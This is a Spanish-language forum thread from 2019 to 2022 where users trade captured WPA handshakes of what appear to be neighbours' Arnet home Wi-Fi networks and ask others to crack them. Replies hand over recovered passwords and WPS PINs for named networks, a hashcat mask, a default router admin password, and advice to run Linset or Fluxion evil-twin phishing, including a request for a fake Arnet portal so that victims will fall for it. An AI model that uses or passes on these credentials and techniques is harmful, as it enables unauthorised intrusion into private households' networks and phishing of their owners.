Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: pdom12 en 15 de Enero de 2019, 06:16:52 PM
Buenas!! Capturé el siguiente handshake:
Red: WiFi-Arnet-j33l-2.4
BSSID: 5C:E2:8C:50:F8:D8
.cap: https://drive.google.com/open?id=1ApAMPpVmZ-Od5gYKUu3ofvCVDk0QlF6G

Si alguno lo saca le voy a estar muy agradecido.

Gracias!!!!
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: pdom12 en 18 de Enero de 2019, 11:00:36 PM
You are not allowed to view links. Register or Login
Buenas!! Capturé el siguiente handshake:
Red: WiFi-Arnet-j33l-2.4
BSSID: 5C:E2:8C:50:F8:D8
.cap: https://drive.google.com/open?id=1ApAMPpVmZ-Od5gYKUu3ofvCVDk0QlF6G

Si alguno lo saca le voy a estar muy agradecido.

Gracias!!!!
Hay antecedentes de descifrar claves de estas redes Arnet?
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: h4x0r en 18 de Enero de 2019, 11:14:13 PM
pdom12, si tu vecino cambio el password puede que salga pero si no la cambio creo que estas al horno!!.
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: negrot en 19 de Enero de 2019, 02:09:48 AM
Hola , hoy vengo a pedir una mano con unos handshakes..... he sacado varias claves y ayudado en cuanto  a Fibertel, ya que tengo una GPU que si bien no es de las ultimas se la banca bastante , pero ahora  me toco estar en la costa y acá capture algunos Handshake de redes , algunas son Arnet( de las que pido ayuda para descifrar dejando los links de los .cap, ya que no entiendo bien los patrones, hasta ahora solo manejaba el Fibercrunch) y también capture otras que luego posteare en servidores desconocidos. Gracias desde ya si pueden y sin apuro!!
las redes son
1 - WiFi-Arnet t1oi
MAC 50-01-D9-02-48-EC
2 - WiFi-Arnet 3q87
MAC E4-BE-ED-E8-E0-E2
3 - WiFi-Arnet 50A97D 
MAC C4-EA-1D-50-A9-7D

http://www.mediafire.com/file/zz9s414ruilneu9/WiFi-Arnet-t1oi_%252850-01-D9-02-48-EC%2529.cap/file
http://www.mediafire.com/file/omov1t9z7xzzs4j/WiFi-Arnet-3q87-E4-BE-ED-E8-E0-E2.cap/file
http://www.mediafire.com/file/g46ngxmllhmmy4v/WiFi-Arnet-50A97D-C4-EA-1D-50-A9-7D.cap/file
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: Gordo en 19 de Enero de 2019, 07:51:42 AM
You are not allowed to view links. Register or Login
Hola , hoy vengo a pedir una mano con unos handshakes..... he sacado varias claves y ayudado en cuanto  a Fibertel, ya que tengo una GPU que si bien no es de las ultimas se la banca bastante , pero ahora  me toco estar en la costa y acá capture algunos Handshake de redes , algunas son Arnet( de las que pido ayuda para descifrar dejando los links de los .cap, ya que no entiendo bien los patrones, hasta ahora solo manejaba el Fibercrunch) y también capture otras que luego posteare en servidores desconocidos. Gracias desde ya si pueden y sin apuro!!
las redes son
1 - WiFi-Arnet t1oi
MAC 50-01-D9-02-48-EC
2 - WiFi-Arnet 3q87
MAC E4-BE-ED-E8-E0-E2
3 - WiFi-Arnet 50A97D 
MAC C4-EA-1D-50-A9-7D

http://www.mediafire.com/file/zz9s414ruilneu9/WiFi-Arnet-t1oi_%252850-01-D9-02-48-EC%2529.cap/file
http://www.mediafire.com/file/omov1t9z7xzzs4j/WiFi-Arnet-3q87-E4-BE-ED-E8-E0-E2.cap/file
http://www.mediafire.com/file/g46ngxmllhmmy4v/WiFi-Arnet-50A97D-C4-EA-1D-50-A9-7D.cap/file

Todas difíciles, sobre todo con la calidad de tus capturas. Presumo que estas lejos de las redes, o estás usando una herramienta incorrecta.
Por ahora puedo ayudarte indicándote que  el PIN WPSde la red "...-3q87" es 52619229. Asi que tendrás que buscar una buena cobertura, y tirar el ataque, ya que es la más fácil.
Si alguien se anima a la "...50A97D", le diría que intente con diez dígitos.
La otra, es un modem-router Huawei, ni hablar de las combinaciones que utiliza. Pero si cambiaron la contraseña por defecto...
Muchas gracias por tu ayuda, y ayudanos nuevamente realizando nuevas capturas con herramientas más actualizadas.
¡Estamos esperando las otras capturas tambén!
¡Saludos!
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: GustavocAr en 19 de Enero de 2019, 11:37:49 AM
You are not allowed to view links. Register or Login
Hola , hoy vengo a pedir una mano con unos handshakes..... he sacado varias claves y ayudado en cuanto  a Fibertel, ya que tengo una GPU que si bien no es de las ultimas se la banca bastante , pero ahora  me toco estar en la costa y acá capture algunos Handshake de redes , algunas son Arnet( de las que pido ayuda para descifrar dejando los links de los .cap, ya que no entiendo bien los patrones, hasta ahora solo manejaba el Fibercrunch) y también capture otras que luego posteare en servidores desconocidos. Gracias desde ya si pueden y sin apuro!!
las redes son
1 - WiFi-Arnet t1oi
MAC 50-01-D9-02-48-EC
2 - WiFi-Arnet 3q87
MAC E4-BE-ED-E8-E0-E2
3 - WiFi-Arnet 50A97D 
MAC C4-EA-1D-50-A9-7D

http://www.mediafire.com/file/zz9s414ruilneu9/WiFi-Arnet-t1oi_%252850-01-D9-02-48-EC%2529.cap/file
http://www.mediafire.com/file/omov1t9z7xzzs4j/WiFi-Arnet-3q87-E4-BE-ED-E8-E0-E2.cap/file
http://www.mediafire.com/file/g46ngxmllhmmy4v/WiFi-Arnet-50A97D-C4-EA-1D-50-A9-7D.cap/file

Maestro acabo de probar y la verdad imposible, ninguna de tus capturas son buenas, ni si quiera por PMKID pude conseguir el hash, asi que a volver a capturar!!  :-\
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: negrot en 20 de Enero de 2019, 12:32:37 PM
You are not allowed to view links. Register or Login
Maestro acabo de probar y la verdad imposible, ninguna de tus capturas son buenas, ni si quiera por PMKID pude conseguir el hash, asi que a volver a capturar!!  :-\

Gracias GustavoAr, intentaré nuevas capturas de handshake!!
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: hydra en 23 de Enero de 2019, 09:06:18 PM
Buenas, la verdad es que con Arnet no me llevo bien, pero bueno, si pueden con esta, estaría bueno.

https://www.mediafire.com/file/uf9svxqc5q6gr5r/arnet.rar/file

Es un rar que contiene el cap y el hccapx para el hashcat si es que hiciera falta, el cap fue sacada con la última versión del wifilax, y en el mismo wifilax hice la conversión del cap.

Saludos y agradecido de antemanto :)
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: hydra en 25 de Enero de 2019, 11:07:50 PM
Bueno, este es otro handshake de arnet, aunque la verdad si sale el anterior, mejor :), sino, ajo y agua ;)

https://www.mediafire.com/file/rlzx3ij5exb0xoo/handshake.rar/file

Desde ya les agradezco, saludos ;)
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: pdom12 en 02 de Febrero de 2019, 04:04:41 PM
Estas nuevas redes arnet (sin el hexa en el nombre) son imposibles hasta hoy, no?

Gracias!
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: Gordo en 02 de Febrero de 2019, 07:25:38 PM
You are not allowed to view links. Register or Login
Estas nuevas redes arnet (sin el hexa en el nombre) son imposibles hasta hoy, no?

Gracias!

Todas son lo mismo de fáciles, y de difíciles. Sobre todo si no brindás ningún tipo de información específica sobre las redes...
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: pdom12 en 02 de Febrero de 2019, 09:57:01 PM
You are not allowed to view links. Register or Login
Todas son lo mismo de fáciles, y de difíciles. Sobre todo si no brindás ningún tipo de información específica sobre las redes...
Información específica como cual?
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: Gordo en 03 de Febrero de 2019, 12:07:16 AM
You are not allowed to view links. Register or Login
Información específica como cual?

Por ejemplo, sobre la última red Arnet que solicitaste ayuda: es un modem/router de marca Zyzel. La clave original está compuesta por al menos cuatro letras en mayúsculas, y las demás letras del alfabeto en minúsculas. También contiene al menos un número. Lamentablemente aún no sabemos cómo descifrar qué lugar de los diez caracteres de la contraseña ocuparía cada letra y/o número.
Sólo debemos rogar porque el dueño de esa red tenga muchos amigos, y que le moleste memorizar su contraseña, y deba cambiarla por otra mucho más fácil como "amantesdelamilanesaconpure", o su número de documento. También te seriviría que use un router TP-Link para extender su red, ya que los routers TP-Link tienen una contraseña -por defecto- de fácil craqueo, y así podrías llegar al router, copiar la contraseña, y poder conectarte a la red.
Bueno, luego de mencionar sólo unos pocos ejemplos, deberías sacarte el sombrero blanco, y colocarte el sombrero de color negro para atacar la red que tanto quieres, en un horario "pico" de uso que vos estimes (porque conocés el vecindario), y hagás que el dueñobde la red se vuelva tan loco por desconocer por qué sus equipos se desconectan, así intente ver si se soluciona cambiando la contraseña por defecto del modem/router. Siempre rogando a Dios de que no tenga la virtud de ser paciente como para comerse esperando novecientos segundos que te hacen esperar los del servicio al cliente de Arnet para que le indiquen que debe presionar el botón de reset que está en la parte trasera; o que luego de que se canse de renegar, los de Arnet le envíen un modem/router de marca Netcore o Shenzhen Fenglian (son los que están instalando ahoraa). Son los más inseguros del sistema solar), pero nos encantan a gente como vos y yo.
Solo queda que pongas de tu parte, y a seguir intentando, que acávestamos para ayudarte.
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: disanramon en 25 de Marzo de 2019, 12:18:03 AM
Muchachos:
1) Que diccionarios están usando para los Huawei nuevos? . Están re duros! Quizá pueda ayudar tengo una 1060 6gb.
2) Con que están testeando la calidad de las capturas?.
Estoy oxidadisimo con Arnet aiudaa!!!
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: disanramon en 23 de Abril de 2019, 05:53:45 PM
You are not allowed to view links. Register or Login
Pero si cambiaron la contraseña por defecto...

No entiendo por qué si cambia la contraseña por defecto sería más fácil, usas algún diccionario en particular?.
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: Gordo en 23 de Abril de 2019, 10:38:32 PM
You are not allowed to view links. Register or Login
No entiendo por qué si cambia la contraseña por defecto sería más fácil, usas algún diccionario en particular?.

Porque para el usuario de la red le sería más facil recordar una o dos palabras "comunes", u ocho dígitos (por ejemplo su número de documento, fecha de nacimiento), en lugar de recordar una combinación "sin sentido" de letras en mayúsculas y números.
Subí las capturas que tengas, y a probar suerte.
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: zebiath en 19 de Mayo de 2019, 08:21:56 PM
hola les pido ayuda o consejos para crackear este cap
https://drive.google.com/open?id=1Bvq10SEqmJ6D-LeBankeydRubvay6rOX
(https://i.imgur.com/MGO5pDp.png)
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: h4x0r en 19 de Mayo de 2019, 09:25:18 PM
You are not allowed to view links. Register or Login
hola les pido ayuda o consejos para crackear este cap
https://drive.google.com/open?id=1Bvq10SEqmJ6D-LeBankeydRubvay6rOX
(https://i.imgur.com/MGO5pDp.png)

primero, las claves son hiper jodidas.
segundo, recaptura porque tu handshake esta incompleto.
tercero, si la clave seria algo facil puede salir!!.
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: TherapyKiss en 26 de Junio de 2019, 06:37:55 PM
Hola, dejo 3 caps de Arnet si me pueden ayudar, es para el laburo. no se sacar las Arnet y se bloqueban por WPS

https://drive.google.com/file/d/1pDYWlFKz06Cz5QoN1x_ItsVwapJyFT1g/view?usp=sharing

https://drive.google.com/file/d/1fWvZf9Z6pyZymQMIis5tWbyGkoasyI98/view?usp=sharing

Este es un Zyxel..Dicen es que es mas facil, no se...
https://drive.google.com/file/d/1vCLxkqGT4MRTnGn_rpSALnoBNLGb9qnY/view?usp=sharing

Si me pueden dar una mano porfa, muchas gracias
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: TherapyKiss en 27 de Junio de 2019, 06:09:15 PM
Help....  :(
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: strike1953 en 27 de Junio de 2019, 06:21:51 PM
You are not allowed to view links. Register or Login
Help....  :(

Lamentablemente no tuve suerte. Son complicadas.
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: h4x0r en 27 de Junio de 2019, 06:45:47 PM
You are not allowed to view links. Register or Login
Help....  :(

usa linset o fluxion!!

tambien te recomiendo cambiar tu version de wifislax, estas usando una version OBSOLETA y tus handshakes son todos MALOS, fijate que tus handshakes no pueden pesar bytes!!.

baja la version que se recomienda que es la wifislax64 v1.1 o superior.
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: strike1953 en 27 de Junio de 2019, 06:58:02 PM
You are not allowed to view links. Register or Login
usa linset o fluxion!!

tambien te recomiendo cambiar tu version de wifislax, estas usando una version OBSOLETA y tus handshakes son todos MALOS, fijate que tus handshakes no pueden pesar bytes!!.

baja la version que se recomienda que es la wifislax64 v1.1 o superior.


Che h4x0r, me parece que vas a tener que ir al oculista.
:P
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: TherapyKiss en 27 de Junio de 2019, 07:08:18 PM
Si recapturo con la última wifislax podrías miralo de vuelta? Porque es en el laburo re pirata y no puedo dejar la note... Si podes no..
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: h4x0r en 27 de Junio de 2019, 07:12:29 PM
You are not allowed to view links. Register or Login
Che h4x0r, me parece que vas a tener que ir al oculista.
:P

es para que se entienda bien!!!

You are not allowed to view links. Register or Login
Si recapturo con la última wifislax podrías miralo de vuelta? Porque es en el laburo re pirata y no puedo dejar la note... Si podes no..

las claves arnet son imposibles, para eso tenes que usar linset o fluxion, no tenes otra opcion por el momento.

igual te recomiendo usar la version que te dije para futuros handshakes de otras redes!!.

Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: strike1953 en 27 de Junio de 2019, 07:18:17 PM
You are not allowed to view links. Register or Login
es para que se entienda bien!!!

las claves arnet son imposibles, para eso tenes que usar linset o fluxion, no tenes otra opcion por el momento.

igual te recomiendo usar la version que te dije para futuros handshakes de otras redes!!.

;D
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: h4x0r en 27 de Junio de 2019, 07:37:32 PM
You are not allowed to view links. Register or Login

Este es un Zyxel..Dicen es que es mas facil, no se...
https://drive.google.com/file/d/1vCLxkqGT4MRTnGn_rpSALnoBNLGb9qnY/view?usp=sharing

Si me pueden dar una mano porfa, muchas gracias

mira lo que te consegui!!

WiFi-Arnet-8985: 80981C5A10

se aceptan donaciones!!!

:) ;) :D ;D :P
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: TherapyKiss en 27 de Junio de 2019, 08:19:14 PM
Amigo si anda te dono posta
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: zebiath en 28 de Junio de 2019, 08:59:38 PM
hola gente, si ya se las caps de arnet son jodidas pero bue si sale hay regalo posta! gracias de antemano!
https://drive.google.com/open?id=1ad__x4tvL6jA9_jY0nuQG5DlwEiM6sgl
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: strike1953 en 28 de Junio de 2019, 09:01:00 PM
You are not allowed to view links. Register or Login
hola gente, si ya se las caps de arnet son jodidas pero bue si sale hay regalo posta! gracias de antemano!
https://drive.google.com/open?id=1ad__x4tvL6jA9_jY0nuQG5DlwEiM6sgl

Una duda, es la misma que subiste a GPUHASH.me y WPA-SEC.stanev?
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: zebiath en 28 de Junio de 2019, 09:04:56 PM
You are not allowed to view links. Register or Login
Lamentablemente no tuve suerte. Son complicadas.

hola striker consulta vos no podes modificar una version de fluxion para que quede con imagenes de arnet asi parece mas real y la gente cae, a mi no me da la cabeza no se linux, ademas ya bastante me costo instalar el fluxion en el wifislax haciendo dos mmil comandos y que funcione, repito no se nadda de linux.
Se agradeceria mucho
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: strike1953 en 28 de Junio de 2019, 09:07:57 PM
You are not allowed to view links. Register or Login
hola striker consulta vos no podes modificar una version de fluxion para que quede con imagenes de arnet asi parece mas real y la gente cae, a mi no me da la cabeza no se linux, ademas ya bastante me costo instalar el fluxion en el wifislax haciendo dos mmil comandos y que funcione, repito no se nadda de linux.
Se agradeceria mucho

Hola, me fijo si lo tengo por alguna carpeta. Lo tenia hace algun tiempo atras.
Desde que utilizo la ultima version de Wifislax no le di mas bolilla a Fluxion ya que no le dan mas soporte porque no es muy efectivo que digamos. Tiene muchas limitaciones en cuanto a su funcionamiento dado que solo determinados dispositivos son compatibles para realmente funcione bien.
Te aviso.
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: mrbytex en 19 de Diciembre de 2019, 03:03:18 AM
Hola.
Alguien me puede ayudar con este handshake?
https://drive.google.com/open?id=19z3nbSnwO-eSZRqHUtk_xsucukePXSsz

WiFi-Arnet-18f2 (60-31-97-8A-BF-63)

o sino con que herramienta creo el diccionario para usar con hashcat.
Gracias
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: h4x0r en 19 de Diciembre de 2019, 03:21:30 AM
You are not allowed to view links. Register or Login
Hola.
Alguien me puede ayudar con este handshake?
https://drive.google.com/open?id=19z3nbSnwO-eSZRqHUtk_xsucukePXSsz

WiFi-Arnet-18f2 (60-31-97-8A-BF-63)

o sino con que herramienta creo el diccionario para usar con hashcat.
Gracias

Por privado se te enviara la clave.
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: Gordo en 19 de Diciembre de 2019, 09:00:28 PM
You are not allowed to view links. Register or Login
Hola.
Alguien me puede ayudar con este handshake?
https://drive.google.com/open?id=19z3nbSnwO-eSZRqHUtk_xsucukePXSsz

WiFi-Arnet-18f2 (60-31-97-8A-BF-63)

o sino con que herramienta creo el diccionario para usar con hashcat.
Gracias
La clave que buscás es 1C8F352E28.

Para encontrar la clave por defecto de este tipo de red no es necesario utilizar un diccionario físico. Podés usar la máscara correspondiente (porque ya sabemos que dicha clave consta de diez caracteres alfanuméricos, de los cuales, el nombre de la red nos está informando de cuatro).
Estuve investigando, y en tu caso, que tenés la fortuna de poder usar Hashcat, -creo-, que podrías utilizar la máscara "1?H8F?H?H2?H?H?H" (sin comillas).
Te invitamos a leer todas las páginas del tema de Arnet, y así sacarte cualquier duda que puedas llegar a tener.
Te pedimos que nos compartas el PIN WPS una vez que puedas ingresar al modem/router. Si no sabés como hacerlo, ingresá en tu navegador:
192.168.1.1/admin.html

Luego:
Usuario: admin (todo el minúsculas)
Contraseña: CalVxePV1! (respetar mayúsculas, minúsculas, y signo).

Buscás "Network Setting" luego de cerrar la ventana emergente de configuración; click en "Wireless", y luego buscás la pestaña "WPS". Y cuando puedas nos contás si es PIN WPS comienza con "7159...", "3477...", o "2090...".

¡Gracias a vos, y perdón por la demora, pero mi "calculadora" no es rápida!
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: h4x0r en 20 de Diciembre de 2019, 01:56:07 AM
Y claro, "calculadora" ajena........

(https://i.ibb.co/YNySr8k/calculadora-ajena.jpg) (https://ibb.co/BfrJ1jZ)

Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: mrbytex en 21 de Diciembre de 2019, 12:16:24 AM
You are not allowed to view links. Register or Login
perdón por la demora, pero mi "calculadora" no es rápida!
Gracias, ya la había sacado. Voy a probar eso desde el mismo hashcat porque me hice un programa que crea el diccionario en txt, que sería casi lo mismo.
Después me fijo si se ve el PIN, porque no estoy en ese domicilio.
Igual con fibertel me pasó que con los Technicolor DPC3848VE antes se veia el PIN entrando a Wireless > WPS, pero se avivaron; actualizaron todos los firmware y los pin no figuran mas entrando al modem/router
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: h4x0r en 22 de Febrero de 2020, 02:14:55 AM
Muchachos con el fin de ordenar el foro y los mensajes, por favor utilicen el boton RESPONDER para el ultimo mensaje, el boton CITA es para mensajes anteriores al ultimo.
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: daniel0600 en 19 de Marzo de 2020, 03:57:52 PM
Hola buenas tardes, excelente el trabajo de todos, los felicito!
ahora va el mangazo.. si alguno gusta entrarle a este, no lo puedo sacar (tal vez este mal el .hccapx)
muchas gracias!

WiFi-Arnet-9csm (A4-CA-A0-02-DF-68)
https://mega.nz/#!dgpmTSSC!AiMMp6qSBUSDA2148RK0VJyIxbu0LK2SdVWg-N14FTk
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: strike1953 en 19 de Marzo de 2020, 04:50:57 PM
@DANIEL0600
Por favor subite el cap
;)
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: agvxtin en 22 de Marzo de 2020, 10:21:21 PM
Hola como estan me podrian ayudar con estas redes

WiFi-Arnet-b9u5-2.4G (3C-78-43-C1-63-38)
https://www.mediafire.com/download/82angig1quke72f

WiFi-Arnet-ecen-2.4G (00-2E-C7-45-D2-48)
https://www.mediafire.com/download/bccfm3ip8srv2dp
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: javier2850 en 25 de Mayo de 2020, 05:05:52 PM
Hola a todos ME podrian orientar que diccionario usar para estas claves de arnet?

WiFi-Arnet-y6kq-2.4G (E0-CC-7A-7D-1C-A4)

https://mega.nz/#!9BtV1Z4C!FclKvNxD26eHqlSdggbVEO_-6W8hXsn1xVi7LrBeRjk
WiFi-Arnet-xqgm-2.4G (80-D4-A5-17-B1-EC)

https://mega.nz/#!hQtFABrA!sRQNsiPt46tOuFhb77M-jgVaYAQc2xgeouO4HJlZLgk
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: h4x0r en 25 de Mayo de 2020, 09:45:06 PM
Intenten por WPS esas claves, tengo entendido que son modems VDSL2 y son vulnerables a WPS.
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: ars28 en 13 de Agosto de 2020, 04:28:37 PM
Hola se podra hace ralgo con este?

WiFi-Arnet-gx55-2.4 (5C-E2-8C-53-39-18)


Intente ataque  wps de Pixie pero no hubo caso
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: notmebug en 13 de Agosto de 2020, 08:40:27 PM
Con la fusión de Cablevisión con Telecom, Arnet mantuvo sus operaciones pero pasó a llamarse Fibertel Lite. ¿Hay algún dato sobre si esto cambió los patrones de clave y/o ESSID para las instalaciones nuevas?

Yo siempre viví en zona sur de Ciudad, así que nunca tuve una red Arnet al alcance... quisiera saber por curiosidad más que nada.
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: lucaseo en 25 de Noviembre de 2020, 06:49:50 PM
You are not allowed to view links. Register or Login
Intenten por WPS esas claves, tengo entendido que son modems VDSL2 y son vulnerables a WPS.
intenté por wps pero se  me bloquea a los 3 intentos, como los otros modem. :(
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: ars28 en 17 de Junio de 2022, 01:04:16 AM
Se podrá hacer algo con esta otra tmb?

SSID: WiFi-Arnet-b7d5
MAC: (E4-BE-ED-D0-5D-08)
Link: RESUELTA POR GORDO
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: Gordo en 17 de Junio de 2022, 09:39:45 AM
You are not allowed to view links. Register or Login

No se puede acceder al archivo sin tu usuario y tu contraseña. Configurá para que sea de acceso público. Gracias.
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: ars28 en 17 de Junio de 2022, 11:34:51 AM
Listo, ahí lo actualicé. Disculpas!
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: Gordo en 17 de Junio de 2022, 11:56:32 AM
You are not allowed to view links. Register or Login

Utilizá el PIN 36553044 para atacar esa red a través del protocolo WPS -si es que está habilitado-. Debés hacerlo con buena intensidad de señal, o se bloqueará. Con las aplicaciones para celulares también podés conectarte con ese PIN.
Si no tiene el WPS habilitado, a seguir esperando por la clave.

¡Saludos!
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: ars28 en 17 de Junio de 2022, 12:12:19 PM
Dale, a la tardecita pruebo y te comento! Gracias!
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: h4x0r en 17 de Junio de 2022, 06:55:35 PM
You are not allowed to view links. Register or Login por favor respetar la regla de posteo.

https://arg-wireless.com.ar/index.php?topic=2398.0
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: ars28 en 17 de Junio de 2022, 10:38:30 PM
You are not allowed to view links. Register or Login
You are not allowed to view links. Register or Login

Utilizá el PIN 36553044 para atacar esa red a través del protocolo WPS -si es que está habilitado-. Debés hacerlo con buena intensidad de señal, o se bloqueará. Con las aplicaciones para celulares también podés conectarte con ese PIN.
Si no tiene el WPS habilitado, a seguir esperando por la clave.

¡Saludos!

Mala suerte. Wps deshabilitado. Intentaré con otra! Muchas gracias
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: Gordo en 18 de Junio de 2022, 11:31:22 PM
You are not allowed to view links. Register or Login

WiFi-Arnet-b7d5: 12838624

¡Saludos!